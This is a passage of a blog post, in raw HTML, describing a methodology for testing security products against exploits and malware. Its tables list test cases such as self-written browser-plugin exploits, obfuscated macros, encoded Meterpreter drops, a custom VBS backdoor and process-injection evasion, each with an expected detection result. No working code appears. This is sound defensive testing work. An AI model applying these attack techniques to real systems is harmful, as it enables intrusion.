<span style="font-family: "nokia sans" , sans-serif; mso-bidi-font-family: "Nokia Sans"; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: "Nokia Sans";"> </span></h3>
<h3 style="margin: 0in 0.5in 0.0001pt -7.1pt; text-align: left; text-indent: -0.25in;">
<span style="font-family: "nokia sans" , sans-serif; mso-bidi-font-family: "Nokia Sans"; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: "Nokia Sans";"> 1.<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; font-weight: normal; line-height: normal;"> </span></span><span style="font-family: "nokia sans" , sans-serif; mso-bidi-font-size: 12.0pt;">My test
methodology (exploit/attack/malware protection quality)</span></h3>
<h1 style="margin: 0in 0.5in 0.0001pt -7.1pt; text-indent: -0.25in;">
</h1>
<h1 style="margin: 0in 0.5in 0.0001pt -7.1pt; text-indent: -0.25in;">
<o:p></o:p></h1>
<div class="11BodyText" style="margin-left: 0in; text-indent: .25in;">
<br /></div>
<div class="11BodyText" style="margin-left: 0in; text-indent: .25in;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhebttUhtvLTdxOaTgERN2-PHBfRJ2-fVJrT8PdsGNyJF-e1Mds_2x_vwj5bugpGqvAfj1GNzdvBA5yuRThlrtsi8hvvGTGWtO8ORlJ9Xto2KX0VZIdBeo0u2r43fhJm_veeGN_EPRr6Q8y/s1600/clip_image001.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="460" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhebttUhtvLTdxOaTgERN2-PHBfRJ2-fVJrT8PdsGNyJF-e1Mds_2x_vwj5bugpGqvAfj1GNzdvBA5yuRThlrtsi8hvvGTGWtO8ORlJ9Xto2KX0VZIdBeo0u2r43fhJm_veeGN_EPRr6Q8y/s640/clip_image001.png" width="640" /></a></div>
<br /></div>
<div align="right" class="11BodyText" style="margin-bottom: .0001pt; margin: 0in; text-align: right; text-indent: .25in;">
Pic 1. Kill Chain stages that are chosen by
us for testing.<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 0in;">
<br /></div>
<h3 style="margin-left: 0in; text-align: left;">
<o:p> </o:p>1.1<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span>Coverage and quality</h3>
<h4 style="margin-left: 0in; text-align: left;">
<span style="font-weight: normal; mso-bidi-font-family: "Nokia Sans"; mso-fareast-font-family: "Nokia Sans";">1.1.1<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span></span>Delivery</h4>
<div class="11BodyText">
I have prepared a few different exploits for testing:<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 82.9pt; mso-list: l3 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]-->a)<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span><!--[endif]-->HTML file with Buffer Overflow exploit in
browser plugin (0day)<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 82.9pt; mso-list: l3 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]-->b)<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span><!--[endif]-->HTML file with Use-After-Free exploit in browser
plugin (0day)<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 82.9pt; mso-list: l3 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]-->c)<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span><!--[endif]-->DOC file with malicious macros (0day)<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 82.9pt; mso-list: l3 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]-->d)<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span><!--[endif]-->EXE file with known 1day exploit for local
privilege escalation (ring0 exploit)<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 82.9pt; mso-list: l3 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]-->e)<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span><!--[endif]-->EXE files with known malware<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 118.9pt; mso-list: l3 level2 lfo3; text-indent: -.25in;">
<!--[if !supportLists]-->a.<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;"> </span><!--[endif]-->Default:
known hash<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 118.9pt; mso-list: l3 level2 lfo3; text-indent: -.25in;">
<!--[if !supportLists]-->b.<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;"> </span><!--[endif]-->Encoded:
unknown hash<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 82.9pt; mso-list: l3 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]-->f)<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span><!--[endif]-->DLL files with known malware<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 82.9pt; mso-list: l3 level1 lfo3; text-indent: -.25in;">
<br /></div>
<table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; margin-left: 59.0pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184; width: 762px;">
<tbody>
<tr style="height: .2in; mso-yfti-firstrow: yes; mso-yfti-irow: 0;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border: solid #161616 1.0pt; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 300.5pt;" valign="bottom" width="501"><div align="center" class="MsoNormal" style="text-align: center;">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">TEST CASE</span></b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: solid #161616 1.0pt; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 156.9pt;" valign="top" width="262"><div align="center" class="MsoNormal" style="text-align: center;">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPECTED BEHAVIOR</span></b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 1;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 300.5pt;" valign="bottom" width="501"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY: HTML with exploits<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 156.9pt;" valign="top" width="262"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 2;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 300.5pt;" valign="bottom" width="501"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY: WORD with macros<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 156.9pt;" valign="top" width="262"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 3;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 300.5pt;" valign="bottom" width="501"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Encoded Meterpreter x64 as an EXE drop<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 156.9pt;" valign="top" width="262"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 4;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 300.5pt;" valign="bottom" width="501"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Encoded Meterpreter x64 as a DLL drop <o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 156.9pt;" valign="top" width="262"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 5;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 300.5pt;" valign="bottom" width="501"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Hash based malware<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 156.9pt;" valign="top" width="262"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and cleaned<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 6; mso-yfti-lastrow: yes;">
<td nowrap="" style="border-top: none; border: solid #161616 1.0pt; height: 15.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 300.5pt;" valign="bottom" width="501"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Not Hash based malware<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #161616 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 156.9pt;" valign="top" width="262"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and blocked<o:p></o:p></span></div>
</td>
</tr>
</tbody></table>
<h4 style="margin-left: 1.25in; text-align: left;">
<span style="font-weight: normal; mso-bidi-font-family: "Nokia Sans"; mso-fareast-font-family: "Nokia Sans";">1.1.2<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span></span>Exploitation</h4>
<div class="11BodyText" style="text-indent: 25.1pt;">
To simulate 0day
attacks and exploits, I created my own vulnerable Internet Explorer plugin and
wrote exploits for it. Likewise, for the DOC file tests at the delivery stage I
created special obfuscated macros. Because exploitation is the most
critical step, I analyzed how each security solution under test detects and
prevents exploitation of vulnerabilities, and evaluated each product
against the defined expected behavior.<o:p></o:p><br />
<br /></div>
<table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; margin-left: 59.0pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184; width: 762px;">
<tbody>
<tr style="height: 15.0pt; mso-yfti-firstrow: yes; mso-yfti-irow: 0;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border: solid #161616 1.0pt; height: 15.0pt; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div align="center" class="MsoNormal" style="text-align: center;">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">TEST CASE</span></b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: solid #161616 1.0pt; height: 15.0pt; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div align="center" class="MsoNormal" style="text-align: center;">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPECTED BEHAVIOR</span></b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 1;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION: ROP Shellcode<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked on any stage of ROP shellcode<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 2;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION: Shellcode<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked on any stage of normal shellcode<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 3;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION: 1day ring0 exploit<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked on any stage<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 4;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION: HeapSpray <o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected or blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 5;">
<td nowrap="" style="border-top: none; border: solid #161616 1.0pt; height: 15.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION: Exploit triggers - UAF, BoF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #161616 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected or blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 6;">
<td nowrap="" style="border-top: none; border: solid #161616 1.0pt; height: 15.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOIT: 0day Macros run<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #161616 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 7;">
<td nowrap="" style="border-top: none; border: solid #161616 1.0pt; height: 15.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOIT: Meterpreter x86
(in mem)<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #161616 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected or Blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 8; mso-yfti-lastrow: yes;">
<td nowrap="" style="border-top: none; border: solid #161616 1.0pt; height: 15.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 305.0pt;" valign="bottom" width="508"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOIT: IOC bypass - migration to EXPLORER (CreateRemoteThread)<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #161616 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 152.4pt;" valign="top" width="254"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected or Blocked<o:p></o:p></span></div>
</td>
</tr>
</tbody></table>
<div class="11BodyText" style="margin-left: 1.25in;">
<br /></div>
<div class="11BodyText" style="margin-left: 1.25in;">
<br /></div>
<h4 style="margin-left: 1.25in; text-align: left;">
<span style="font-weight: normal; mso-bidi-font-family: "Nokia Sans"; mso-fareast-font-family: "Nokia Sans";">1.1.3<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span></span>Installation</h4>
<div class="11BodyText">
I used a self-made VBS backdoor (with unknown signatures)
that is dropped by the exploit/shellcode. Additionally, I used Metasploit Meterpreter (in different
configurations) as a backdoor. The test cases simulated the following kill chain
steps: exploitation, downloading the backdoor, and execution.<o:p></o:p></div>
<div class="11BodyText">
Test case names:<o:p></o:p><br />
<br /></div>
<table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; margin-left: 59.0pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184; width: 762px;">
<tbody>
<tr style="height: .2in; mso-yfti-firstrow: yes; mso-yfti-irow: 0;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border: solid #161616 1.0pt; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div align="center" class="MsoNormal" style="text-align: center;">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">TEST CASE</span></b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: solid #161616 1.0pt; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div align="center" class="MsoNormal" style="text-align: center;">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPECTED BEHAVIOR</span></b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 1;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION/INSTALL: DbD with VBS - BoF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked on any stage of attack (earlier better)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 2;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION/INSTALL: DbD with VBS - UAF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked on any stage of attack (earlier better)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 3;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION/INSTALL: DbD with met64 - BoF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked on any stage of attack (earlier better)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 4;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION/INSTALL: DbD with met64 - UAF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked on any stage of attack (earlier better)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 5;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">INSTALL: VBS backdoor run<o:p></o:p></span></div>
</td>
